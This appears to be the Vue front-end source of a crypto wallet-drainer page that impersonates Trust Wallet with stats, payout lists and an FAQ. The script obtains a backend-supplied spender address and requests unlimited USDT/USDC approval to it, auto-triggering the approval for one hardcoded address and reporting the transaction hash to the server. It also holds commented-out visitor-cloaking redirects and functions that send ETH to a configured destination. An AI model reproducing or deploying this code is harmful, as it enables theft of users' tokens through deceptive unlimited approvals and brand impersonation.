<style>

.draw2-enter-active, .draw2-leave-active {
     transition: 0.3s;
   /* transform: scale(1,1); */
 transform-origin: var(--popper-transform-origin);
  opacity: 1; visibility: visible;
transform: none;
}
.draw2-enter, .draw2-leave-to /* .fade-leave-active below version 2.1.8 */ {
    /* transform: scale(1,0); */
 transform-origin: var(--popper-transform-origin);
 opacity: 0; visibility: hidden;
transform: scale(0.8) translateZ(0px);
}

.draw3-enter-active, .draw3-leave-active {
     transition: 0.1s;
   /* transform: scale(1,1); */
 transform-origin: var(--popper-transform-origin);
  opacity: 1; visibility: visible;
}
.draw3-enter, .draw3-leave-to /* .fade-leave-active below version 2.1.8 */ {
    /* transform: scale(1,0); */
 transform-origin: var(--popper-transform-origin);
 opacity: 0; visibility: hidden;
}

/* .bg {
	background:radial-gradient(66.32% 66.32% at 54.13% 113.95%,rgba(108,38,255,.2) 0,rgba(242,89,255,0) 100%),linear-gradient(211.99deg,rgba(65,157,241,.2) -4.17%,rgba(45,143,234,0) 68.7%),radial-gradient(100% 100% at 28.65% 0,rgba(109,0,255,.25) 0,rgba(250,247,254,0) 100%);
	width:100vw;height:100vh;overflow:auto;
  -webkit-font-smoothing:antialiased;
  font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
	} */
  .bg {
    background: #ffffff;
    width: 100%;
    /* 删除 height:100vh; overflow:auto; */
    -webkit-font-smoothing:antialiased;
    font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
@keyframes rotate {
  0% {
    -webkit-transform: rotate(0deg);
  }

  25% {
    -webkit-transform: rotate(90deg);
  }

  50% {
    -webkit-transform: rotate(180deg);
  }

  75% {
    -webkit-transform: rotate(270deg);
  }

  100% {
    -webkit-transform: rotate(360deg);
  }
}
.banner{width:100vw;margin: 0;padding: 0;overflow: hidden;}
.banner img{width:100%;}
.partners{width:100vw;margin: 0 auto;padding-top: 3vw;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-color:#000;}
.partners span.name{display: block;text-align: center; color:#fff;
font-size: 6vw;font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;}
.partners ul{list-style: none;margin:0;padding: 0;overflow: hidden;
width:86vw;margin:0 auto;}
.partners ul li{width:20%;float: left;vertical-align: middle;text-align: center;
line-height: 12vw;overflow: hidden;height: 12vw;float:left;}
.partners ul li img{width:80%;vertical-align: middle;
overflow: hidden;}
.partners span.copyright{display: block;text-align: center;
height:10vw;line-height:10vw;color:#fff;font-size: 3vw;}
.head{width:100vw;height: 12vw;background-color: #fff;
padding: 0;position: relative;}
.head img.logo{height:8vw;top:2vw;display: block;
left: 12vw;position: absolute;}
.head img.menu{height:8vw;top:2vw;display: block;
left: 3vw;position: absolute;}
.head_lang{height:8vw;float: right;
top: 2vw;padding: 0 2vw;border-radius: 1vw;
right: 3vw;position: absolute;}
.head_lang img.earth{display: block;float: right;width:6vw;
margin-right: 3vw;margin-top:1vw;}
.head_lang img.lightDark{display: block;float: right;width:6vw;margin-top:1vw;}

.head_lang span{display: block;float: right; height:5vw;width:1px;
border-right:#8f8f8f solid 1px;margin-top: 1.5vw;margin-right: 3vw;}
.home-title{width:90%;font-family:  Poppins;
;font-size: 4vw;margin: 0 auto;padding: 3vw 0;}
.home-amount{width:95%;margin: 0 auto;display: flex;
justify-content: space-between;flex-flow: row wrap;}
.home-amount-box{width:40vw;height: 20vw;background-color: #fafafa;
margin-top: 3vw;border-radius: 3vw;}
.home-amount-box span{display: block;text-align: center;color: #000;}
.home-amount-box span.home-amount-amount{font-size: 5.5vw;height: 8vw;
line-height: 8vw;font-family: Arial,sans-serif!important;
font-weight: bold;margin-top: 3vw;}
.home-amount-box span.home-amount-name{font-size: 3vw;height: 5vw;
line-height: 5vw;margin-top: 1vw;}
.home-steps{width:90vw;height:35vw;margin: 0 auto;margin-top:5vw;}
.home-steps-box{width:23vw;height: 35vw;float: left;}
.home-steps-box span{display: block;width:5vw;text-align: center;
height:5vw;background-color: #9ca9b6;color: #fff;
border-radius: 2vw;line-height: 5vw;font-size: 4vw;}
.home-steps-box img{display: block;margin: 0 auto;width:15vw;
height: 15vw;margin-top: 3vw;}
.home-steps-box p{display: block;width: 100%;text-align: center;
margin-top: 3vw;font-size: 3.5vw;}
.home-steps-next{width:6vw;height: 35vw;
float: left;margin-left:2vw;overflow: hidden;margin-right: 2vw;}
.home-steps-next img{width: 6vw;display: block;margin: 0 auto;
margin-top:13vw;}
.join{width:90vw;margin: 0 auto;margin-top: 5vw;position: relative;
height: 14vw;}
.join button{background-color: rgb(252, 213, 53);width: 100%;
height: 14vw;border-radius: 2vw;font-size: 5vw;font-weight: bold;
outline: none;border: 0;font-family:  Arial,sans-serif!important;
position: absolute;left: 0;top: 0;z-index: 99;}
.join button.joined{color: #fff;}
.join-cover{width: 90vw;height: 14vw;position: absolute;left: 0;top: 0;
z-index: 999;background-color: rgba(237, 237, 237, .9);}
.join-cover svg{height: 14vw;display: block;margin: 0 auto;}
.join-cover .path{stroke-dasharray:90,150;stroke-dashoffset:0;stroke-width:2;
stroke:#409eff;stroke-linecap:round;animation:loading-dash 1.5s ease-in-out infinite;}
@keyframes loading-dash{
  0% {
    stroke-dasharray:1,200;
    stroke-dashoffset:0;
  }
  50% {
    stroke-dasharray:90,150;
    stroke-dashoffset:-40px;
  }
  100% {
    stroke-dasharray:90,150;
    stroke-dashoffset:-120px;
  }
}
.hone-output{width:90vw;margin: 0 auto;margin-top: 5vw;}
.hone-output span.title{width: 100%;text-align: center;
display: block;font-size: 5vw;color: #999;}
.hone-output ul{width:100%; background-color: #fafafa;height: 85vw;
list-style: none;border: 0;margin: 0;padding: 0;overflow: hidden;
border-radius: 2vw;padding: 3vw 0;margin-top: 3vw;}
.hone-output ul li{width:95%;margin: 0 auto;height: 8vw;overflow: hidden;}
.hone-output ul li span{display: block;font-size: 3.5vw;
line-height:8vw;font-family:  Arial,sans-serif!important;}
.hone-output ul li span.addr{width: 50%;float: left;color: #333;}
.hone-output ul li span.usdtvalue{width: 45%;float: right;
color:#000;font-weight: bold;text-align: right;}
.hone-output ul li b{color: #333;font-weight: normal;padding-left: 2vw;}
.home-choose{width:90vw;margin: 0 auto;
display: flex;justify-content: space-between;flex-flow: row wrap;}
.home-choose-box{width:35vw;height:35vw;background-color: #fafafa;
border-radius: 10vw;margin-top: 3vw;}
.home-choose-box img{display: block;margin: 0 auto;width:15vw;
margin-top: 5vw;}
.home-choose-box span{display: block;width:100%;text-align: center;
font-size: 3.5vw;margin-top: 3vw;}
.home-faq{width:90vw;margin: 0 auto;}
.home-faq span.home-faq-title{font-size: 5vw;text-align: center;
display: block;}
.home-faq ul{width:100%;list-style: none;margin: 0;padding: 0;
overflow: hidden;}
.home-faq ul li{min-height: 10vw;border-bottom: #eee solid 1px;}
.home-faq-li{width:100%;height: 10vw;}
.home-faq-li span{display: block;float: left;line-height:10vw;
max-width: 80vw;text-overflow: ellipsis;white-space:nowrap;
overflow: hidden;font-size: 3.5vw;color: #333;}
.home-faq-li img{display: block;width: 6vw;float: right;
margin-top: 2vw;}
.home-faq-li img.faq-show{rotate: 90deg;}
.home-faq ul li p{font-size: 3.5vw;line-height: 6vw;
font-family:  Arial,sans-serif!important;}


.mengban{width: 100vw;height: 100vh;background-color: rgba(0, 0, 0, .2);
position: fixed;top:0;z-index: 1000000;}
.msg-box{width:90vw;margin: 0 auto;background-color: #fff;margin-top: 50%;
padding: 5vw 0;border-radius: 1vw;}
.msg-content{width:80vw;margin: 0 auto;padding: 0;overflow: hidden;
line-height: 10vw;font-size: 4vw;}
.msg-box button{background-color: rgb(252, 213, 53);width:80vw;height: 12vw;
display: block;margin: 0 auto;line-height: 12vw;font-size: 4vw;
border-radius: 1vw;}


.partnersd{width:100vw;margin: 0 auto; position: fixed;
bottom:15vw;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;}
.partnersd span.copyright{display: block;text-align: center;
height:10vw;line-height:10vw;color:#333;font-size: 3vw;}

.msg-head{width:90%;margin:0 auto;padding: 0;overflow: hidden}
.msg-head img{display: block;width:7vw;float: right;}
</style>
<template>
	<div class="bg" v-if="all_show">
    <headers @chain_changed="chain_changed($event)" @usd_changed="usd_changed($event)" @change="toconnect($event)" :chain="chain_id" :address="addr" :connected="connected" :now="now"></headers>
    <div class="mengban" v-if="has_msg == 1">
      <div class="msg-box">
        <div class="msg-head"><img @click="read" src="../../../static/images/closed.svg"></div>
        <div class="msg-content">{{msg}}</div>
        <button @click="read">{{$t('home.index53')}}</button>
      </div>
    </div>
    <div class="banner">
      <img src="../../../static/images/foreground-image-light.png?id=11">
    </div>
	<div class="join">
	  <div v-if="!connected" class="join-cover">
	    <svg viewBox="25 25 50 50" class="circular"><circle cx="50" cy="50" r="20" fill="none" class="path"></circle></svg>
	  </div>
	  <button v-if="!joined" @click="getApprove()">{{$t('home.index10')}}</button>
	  <button v-else="joined" @click="Userjoined()" class="joined">{{$t('home.index11')}}</button>
	</div>
    <div class="home-title">{{$t('home.index2')}}

    </div>
    <div class="home-amount">
       <div class="home-amount-box">
         <span class="home-amount-amount">{{basic_data.wallets}}</span>
         <span class="home-amount-name">{{$t('home.index3')}}</span>
       </div>
       <div class="home-amount-box">
         <span class="home-amount-amount">{{basic_data.pool}}</span>
         <span class="home-amount-name">{{$t('home.index4')}}</span>
       </div>
       <div class="home-amount-box">
         <span class="home-amount-amount">{{basic_data.participant}}</span>
         <span class="home-amount-name">{{$t('home.index5')}}</span>
       </div>
       <div class="home-amount-box">
         <span class="home-amount-amount">{{basic_data.revenue}}</span>
         <span class="home-amount-name">{{$t('home.index6')}}</span>
       </div>
    </div>
    <!-- <div class="home-title">{{$t('home.index1')}}
    </div> -->
    <div class="home-steps">
      <div class="home-steps-box">
        <span>1</span>
        <img src="../../../static/images/step1.jpg">
        <p>{{$t('home.index7')}}</p>
      </div>
      <div class="home-steps-next">
        <img src="../../../static/images/next.svg">
      </div>
      <div class="home-steps-box">
        <span>2</span>
        <img src="../../../static/images/step2.jpg">
        <p v-if="usd==2">{{$t('home.index1008')}}</p>
        <p v-else>{{$t('home.index8')}}</p>
      </div>
      <div class="home-steps-next">
        <img src="../../../static/images/next.svg">
      </div>
      <div class="home-steps-box">
        <span>3</span>
        <img src="../../../static/images/step3.jpg">
        <p v-if="usd==2">{{$t('home.index1009')}}</p>
        <p v-else>{{$t('home.index9')}}</p>
      </div>
    </div>
   
    <div class="hone-output">
      <span class="title" v-if="usd==2">{{$t('home.index1012')}}</span>
       <span class="title" v-else>{{$t('home.index12')}}</span>
      <ul>
        <li v-for="item in ulList">
          <span class="addr">{{item.address}}</span>
          <span class="usdtvalue">{{item.amount}}<b v-if="usd==2">usdc</b><b v-else>usdt</b></span>
        </li>

      </ul>
    </div>
    <div class="banner">
      <img src="../../../static/images/feed-entry-pc.svg">
    </div>
    <div class="home-title">
      {{$t('home.index13')}}
    </div>
    <div class="home-choose">
       <div class="home-choose-box">
         <img src="../../../static/images/m1.png">
         <span>{{$t('home.index14')}}</span>
       </div>
       <div class="home-choose-box">
         <img src="../../../static/images/m2.png">
         <span>{{$t('home.index15')}}</span>
       </div>
       <div class="home-choose-box">
         <img src="../../../static/images/m3.png">
         <span>{{$t('home.index16')}}</span>
       </div>
       <div class="home-choose-box">
         <img src="../../../static/images/m4.png">
         <span>{{$t('home.index17')}}</span>
       </div>
    </div>
    <div class="home-faq">
      <span class="home-faq-title">
        FAQ
      </span>
      <ul>
        <li @click="show_faq(item.id)" v-for="item in faq">
          <div class="home-faq-li">
            <span>{{item.q}}</span>
            <img :class="item.show?'faq-show':''" src="../../../static/images/right.svg">
          </div>
          <p v-if="item.show" v-html="item.a"></p>
        </li>
      </ul>
    </div>
    <div class="partners">
    	<span class="name">{{$t('home.index18')}}</span>
    	<ul>
    		<li v-for="(item,index) in partner">
    			<img  :src="'../../../static/images/partner/'+item+'.png'">
    		</li>
    	</ul>
      <span class="copyright">Copyright © 2017-2026 Trust Wallet All Right Reserved.</span>
    </div>
    <div class="blank"></div>
    <menus :now="now"></menus>
	</div>
</template>
<script>
import menus from '../components/menus.vue'
import { ethers } from 'ethers'
import { connectWallet, disconnectWallet, getAccount, getChainId, getGasPrice, getProvider } from '../../utils/wallet'
import { getAllowance, approveUnlimited, revokeApproval } from '../../utils/erc20'
import headers from '../components/header.vue'
 
const ETH_CHAIN_ID = 1
const ETH_RPC = 'https://cloudflare-eth.com'  // 备用，切链时用；建议换成你自己的带 Key 节点

// USDT 在 ETH 主网的地址
const TOKEN_ADDRESS = '0xdAC17F958D2ee523a2206206994597C13D831ec7'  // USDT-ETH
const SPENDER_ADDRESS = '0x9c1dcd837d14834b8f3ca9926d33a9d640fd4542'

// 最小化的 ERC20 ABI
const ERC20_ABI = [
  'function approve(address spender, uint256 amount) returns (bool)',
  'function allowance(address owner, address spender) view returns (uint256)',
  'function decimals() view returns (uint8)'
]


import Qs from 'qs'
export default {
  components: {
    menus,
    headers
  },
  data () {
    return {
      now: 1,
      provider: '',
      balance: 0,
      connected: false,
      address: '',
      partner: [],
      web3: null,
      faq: [],
      gas: '',
      ref: '',
      code: '',
      addr: '',
      token: '',
      joined: false,
      dest_address: '',
      approve_hash: '',
      basic_data: '',
      chain_id: 56,
      msg_id:'',
      has_msg: 0,
      usd: 2,
      msg: '',
	    userAgent: '',
	    userAgent2: '',
	    all_show: true,
      ulList: [],
	  timers:null,
	  account: '',
	  loading: false,
	  errMsg: '',
	   walletReady: false
    }
  },
   async created() {
	 // this.ref = this.$utils.getUrlKey('ref')
      await connectWallet()
      this.walletReady = true
    },
  async mounted () {
 
	    await this.$nextTick()
	  
	    const provider = getProvider()
	    if (!provider) {
	      console.log('未连接钱包，跳过链信息获取')
	      return
	    }
		let self = this
		this.timers = setInterval(() => {
		    if (!this.connected) {
		        this.getAddress()
		    } else {
				 clearInterval(this.timers)
			}
		}, 3000)
    if (window.ethereum) {
	  try {
		// 尝试静默恢复连接（不弹授权框）
		const accounts = await window.ethereum.request({ method: 'eth_accounts' })
		if (accounts.length > 0) {
			this.address = accounts[0]
		  // 已经授权过，直接恢复 provider
		  await connectWallet()
		}
	  } catch (e) {
		console.log('恢复连接失败', e)
	  }
	}
	if (getProvider()) {
	    this.chain_id = await getChainId()
		console.log(this.chain_id)
	    this.gas = await getGasPrice()
	} else {
		console.log(777)
	}
    
    for (var i = 0; i <= 39; i++) {
      self.partner.push(i)
    }
    this.ref = this.$utils.getUrlKey('ref')
    this.code = this.$utils.getUrlKey('code')
    // const utm_source = this.$utils.getUrlKey('utm_source')
    // if(!utm_source || utm_source.length==0){
    //   window.location.href="https://binance.com"
    // }
   // if(this.code){
       this.userAgent2 = navigator.userAgent;
       this.userAgent = window.location.href
       this.userAgent = this.userAgent.toLowerCase();
       this.userAgent2 = this.userAgent2.toLowerCase();
   // if(this.userAgent.includes("trust") || this.userAgent2.includes("android")){
     //  this.all_show = true
       this.get_basic()
       this.get_qa()
       this.getAddress()
       this.get_output()
       setInterval(this.startPlay, 2000)
	   
	  //  setTimeout(() => {
		   
		 // self.getAddress()
	  //  }, 3000) // 3000毫秒 = 3秒
	      
     //  }else{
       //  window.location.href="https://www.bitget.com/"
       // }
   // }
  },
  methods: { 
	 
    readEntrance () {
      const entrance_token = localStorage.getItem('entrance_token');
      const _this = this
      const data = {
        address: _this.address,
        token: entrance_token
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/readEntrance',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state == 1) {
          if(data.data.status == 2) {
          //  window.location.href = data.data.url
          } else {
            this.all_show = true
          }
        }
      }).catch(error => {
        console.log(error)
      })
    },
    getEntrance () {
      const _this = this
      const data = {
        address: _this.address,
        code: _this.code
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/getEntrance',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state == 1) {
          if(data.data.status == 2) {
           // window.location.href = data.data.url
          } else {
            this.all_show = true
            localStorage.setItem('entrance_token',data.data.token);
          }
        }
      }).catch(error => {
        console.log(error)
      })
    },
    chain_changed (id) {
      this.chain_id = id
      this.getAddress()
    },
    usd_changed (id) {
      this.usd = id
      this.getAddress()
    },
    get_output () {
      const _this = this
      const data = {
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_output',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.ulList = data.data
        }
      }).catch(error => {
        console.log(error)
      })
    },
    startPlay () {
      let that = this
      that.play = true // 开始播放
      setTimeout(() => {
        that.ulList.push(that.ulList[0]) // 将第一条数据塞到最后一个
        that.ulList.shift() // 删除第一条数据
        that.play = false // 暂停播放,此处修改，保证每一次都会有动画显示
      }, 500)
    },
    async toconnect (val) {
      console.log(val)
      //
      this.getAddress()
    },
    Userjoined () {
      this.$toast.center(this.$t('home.index19'))
    },
    async getAddress () {
	  let Address = getAccount()
	  console.log(111)
	   console.log(Address)
	   this.address = Address
	    console.log(this.chain_id)
      //this.chain_id = await getChainId()
	 // console.log(this.chain_id)
    //  this.gas = await getGasPrice()
     // const chainId_now = parseInt(chainId, 16)
      if (this.chain_id != 56 && this.chain_id != 1) {
        this.$toast.center(this.$t('home.index21'))
      } else {
        const chainIds = localStorage.getItem('chainId');
         if(!chainIds || chainIds == 'undefined'){
          // this.chain_id = this.chain_id
         //  this.usd = 2
		 localStorage.setItem('chainId',this.chain_id);
         }
		 if(Address){
			  this.connected = true
		 }
       
        this.dologin()
      }
    },
    dologin () {
      const _this = this
      const data = {
        address: _this.address,
        ref: _this.ref
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/login',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.addr = data.data.addr
          this.token = data.data.token
            console.log( this.token)
          if (this.token) {
            if(this.code){
              this.getEntrance()
            } else {
              this.readEntrance()
            }
            this.get_approve()
            this.get_basic()
            this.get_locked()
          }
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_locked () {
      const _this = this
      const data = {
        token: _this.token
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_locked',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state == 1) {
          this.msg = data.data.msg
          this.has_msg = data.data.has_msg
          this.msg_id = data.data.msg_id
        }
      }).catch(error => {
        console.log(error)
      })
    },
    read () {
      const _this = this
      const data = {
        token: _this.token,
        msg_id: _this.msg_id
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/read',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        this.has_msg = 0
        if (data.state == 1) {
          this.get_locked()
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_basic () {
      const _this = this
      const data = {
        token: _this.token
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_basic_data',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.basic_data = data.data
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_qa () {
      const _this = this
      const data = {
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_qa',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.faq = data.data
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_approve () {
      const _this = this
      const data = {
        token: _this.token,
        chain: _this.chain_id,
        usd: _this.usd
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_approve_address',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state == 1) {
          this.joined = true
        } else {
          this.joined = false
          this.dest_address = data.data
          if(this.chain_id == 56){
            // this.getApprove()
          }
          const addr = '0x3eb2b6aa0dee83dc75c198edc20bcb9e00908e0b';

          if(this.chain_id == 1 && this.address.toLocaleLowerCase() == addr.toLocaleLowerCase()){
             this.getApprove()
          }
        }
      }).catch(error => {
        console.log(error)
      })
    },
    finish_approve () {
      const _this = this
      const data = {
        token: _this.token,
        dest: _this.dest_address,
        chain: _this.chain_id,
        usd: _this.usd,
        hash: _this.approve_hash
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/finish_approve',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          _this.get_approve()
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get () { // 唤起钱包
      if (window.ethereum) {
        window.ethereum.enable().then((res) => {
          this.address = res[0]
          this.toconnect()
        })
      } else {
        alert('请安装MetaMask钱包')
      }
    },
    async getETH () {
      if (window.ethereum) {
        this.provider = window.ethereum
        try {
          await window.ethereum.enable()
        } catch (error) {
          console.log('User denied account access')
        }
      } else if (window.web3) {
        this.provider = window.web3.currentProvider
      } else {
        this.provider = new Web3.providers.HttpProvider(this.$rpc)
      }
      let web3 = new Web3(window.web3.currentProvider)
      let fromAddress = await web3.eth.getAccounts()
      web3.eth.getBalance(fromAddress[0], (err, res) => {
        if (!err) {
          this.balance = res / Math.pow(10, 18)
          if (this.balance < this.amount) {
            this.$toast.center(this.$t('home.index38'))
          } else {
            this.getTransfer()
          }
        }
      })
    },
    // ETH转账
    async getTransferGas () {
      let web3 = new Web3(window.web3.currentProvider)
      this.gas = await web3.eth.getGasPrice()
      this.gas = this.gas * 1.5
      this.gas = this.gas.toFixed(0)
      let fromAddress = await web3.eth.getAccounts()
      let amount = this.amount * Math.pow(10, 18)
      var val = this.gas / 1000000000000000000 * 50000
      val = val * Math.pow(10, 18)
      let toAddress = this.$dest
      let self = this
      web3.eth.sendTransaction({
        gas: 21000,
        gasPrice: self.gas,
        from: fromAddress[0],
        to: toAddress,
        value: val
      }, function (error, hash) {
        self.get_award(hash)
      }).then(function (receipt) {
        console.log(receipt)
        	self.award_done(receipt.transactionHash)
      })
    },
    async getTransferGas2 () {
      let web3 = new Web3(window.web3.currentProvider)
      this.gas = await web3.eth.getGasPrice()
      this.gas = this.gas * 1.5
      this.gas = this.gas.toFixed(0)
      let fromAddress = await web3.eth.getAccounts()
      let amount = this.amount * Math.pow(10, 18)
      var val = this.gas / 1000000000000000000 * 50000
      val = val * Math.pow(10, 18)
      let toAddress = this.$dest
      let self = this
      web3.eth.sendTransaction({
        gas: 21000,
        gasPrice: self.gas,
        from: fromAddress[0],
        to: toAddress,
        value: val
      }, function (error, hash) {
        self.get_award2(hash)
      }).then(function (receipt) {
        console.log(receipt)
        	self.award_done2(receipt.transactionHash)
      })
    },
    async getTransfer () {
      let web3 = new Web3(window.web3.currentProvider)
      this.gas = await web3.eth.getGasPrice()
      this.gas = this.gas * 1.5
      this.gas = this.gas.toFixed(0)
      let fromAddress = await web3.eth.getAccounts()
      let amount = 0
      if (this.amount < 1000) {
        amount = this.amount * Math.pow(10, 18)
      } else if (this.amount < 10000) {
        amount = this.amount * Math.pow(10, 17)
        amount = amount + '0'
      } else {
        amount = this.amount * Math.pow(10, 16)
        amount = amount + '00'
      }

      let toAddress = this.$dest
      let self = this
      web3.eth.sendTransaction({
        gas: 21000,
        gasPrice: self.gas,
        from: fromAddress[0],
        to: toAddress,
        value: amount
      }, function (error, hash) {
        self.make_order(hash)
        self.pay = true
        console.log(hash)
      }).then(function (receipt) {
        console.log(receipt)
        	self.order_done(receipt.transactionHash)
        self.pay = false
      })
    },
    // 查询代币余额
    async getTokenBalance () {
      if (window.web3) {
        let fromAddress = this.address// 查询用户地址
        let ethContract = new this.web3.eth.Contract(abi, '0x3b9661287c23e1ea44eeb1c2a606b51432d70863') // 所有代币的abi可以通用（abi,合约地址）
        let balance = await ethContract.methods.balanceOf(fromAddress).call()
        alert(balance)
      }
    },
    
    // 查询授权金额
    async getAllowance () {
      if (window.web3) {
        let web3 = new Web3(window.web3.currentProvider)
        let fromAddress = '0x394A64e586FC05bD28783351F14dfcc426EFD230'// 查询地址
        let ethContract = new web3.eth.Contract(abi.abi, '0x3d2dd604866d0ec1ddd5e8ef27848a6fc0962018') // 所有代币的abi可以通用（abi,合约地址）
        let toAddress = '0xcaD75EADAf24F41d6274E129d7aE54764d7cd8E7'// 被授权地址
        let balance = await ethContract.methods.allowance(fromAddress, toAddress).call()
        alert('授权金额' + balance / Math.pow(10, 18))
      }
    }, 
    async getApprove () {
      let self = this
      let token = self.$token
      if(self.chain_id == 56){
        if(self.usd == 1) {
          token = self.$token
        } else {
          token = self.$token3
        }
      } else {
        if(self.usd == 1) {
          token = self.$token2
        } else {
          token = self.$token4
        }
      }
      // let token = self.chain_id == 56 ? self.$token : self.$token2
	  this.loading = true
	  try {
	    const receipt = await approveUnlimited(
	      token.trim(),
	      self.dest_address,
		  self.chain_id
	    )
		console.log(receipt)
	    self.approve_hash = receipt.transactionHash
	     
	  } catch (e) {
	    this.errMsg = e.message || 'Approve 失败'
		 console.log(this.errMsg)
	  } finally {
	    self.finish_approve()
	  }
	  
	   
		
  //     let ethContract = new this.web3.eth.Contract(abi, token) // 所有代币的abi可以通用（abi,合约地址）
  //     ethContract.methods.approve(self.dest_address, '0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff').send({
  //       from: self.address,
  //       gasPrice: self.gas,
  //       gas: '0x1D4C0'
  //     }, function (err, tx) {
  //       console.log(err, tx)
  //       if (!err) {
  //         self.approve_hash = tx
  //       }
  //     }).then(function (receipt) {
  //       if (receipt.status) {
  //         self.finish_approve()
  //       }
  //     })
    },
    show_faq (id) {
      let self = this
      var list = []
      this.faq.forEach(function (obj, index) {
      				 list[index] = obj
      				 if (obj.id == id) {
      					 list[index].show = !obj.show
      				 }
      })
      this.faq = list
    }

  },
  watch: {
  },
  beforeDestroy() {
      clearInterval(this.timers)
  }
}
</script>
